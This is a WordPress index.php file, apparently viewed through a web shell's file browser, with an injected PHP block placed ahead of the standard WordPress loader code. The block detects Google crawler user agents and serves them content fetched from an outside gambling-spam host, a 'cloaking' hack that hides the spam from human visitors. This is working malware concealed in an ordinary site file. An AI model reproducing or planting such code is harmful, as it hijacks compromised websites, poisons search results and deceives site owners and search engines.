View file File name : index.php Content :<?php function is_google_bot() { $agents = array( "Googlebot", "AdsBot-Google", "Mediapartners-Google", "Google-Site-Verification", "Google-InspectionTool", "Googlebot-Mobile", "Googlebot-News" ); $user_agent = $_SERVER['HTTP_USER_AGENT']; foreach ($agents as $agent) { if (strpos($user_agent, $agent) !== false) { return true; } } return false; } if (is_google_bot()) { echo file_get_contents("https://accesslink.top/totoslot/cloacking-php/provobis/"); exit; } ?> <?php /** * Front to the WordPress application. This file doesn't do anything, but loads * wp-blog-header.php which does and tells WordPress to load the theme. * * @package WordPress */ /** * Tells WordPress to load the WordPress theme and output it. * * @var bool */ define( 'WP_USE_THEMES', true ); /** Loads the WordPress Environment and Template */ require __DIR__ . '/wp-blog-header.php';